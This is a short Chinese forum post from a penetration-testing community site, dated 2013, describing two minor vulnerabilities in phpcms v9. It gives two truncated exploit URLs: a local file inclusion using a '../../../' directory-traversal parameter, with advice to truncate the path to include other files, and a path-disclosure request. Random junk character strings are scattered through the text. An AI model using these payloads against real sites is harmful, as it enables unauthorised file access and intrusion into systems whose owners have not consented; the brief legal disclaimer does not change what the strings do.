中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
' w/ {/ V k) V5 ~4 e2 b
1 k3 H, ~! ?: \" D8 H3 K* k; s
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
# v. x( N( f; Z- l
r0 [3 h7 b/ |1 I
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
4 |( A$ ]) S, Q6 D, o% [
1 f. t% ?; ~7 u2 z% f. a$ b
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
* J; y$ ^1 ?& y8 Q4 a
M& I$ J- K: L+ `& y
#暴路径
: V, _* q/ N6 D- d" x, C2 e
* K) B5 h4 ^7 E7 P) t
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
9 C& Z9 q% U! Q: i: T2 W# q7 n
' P7 x& h$ K" T
" T5 g" [( E) q' Q& c# P( j/ j( F
8 u" P* U4 e: i$ {3 t3 g
+1
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2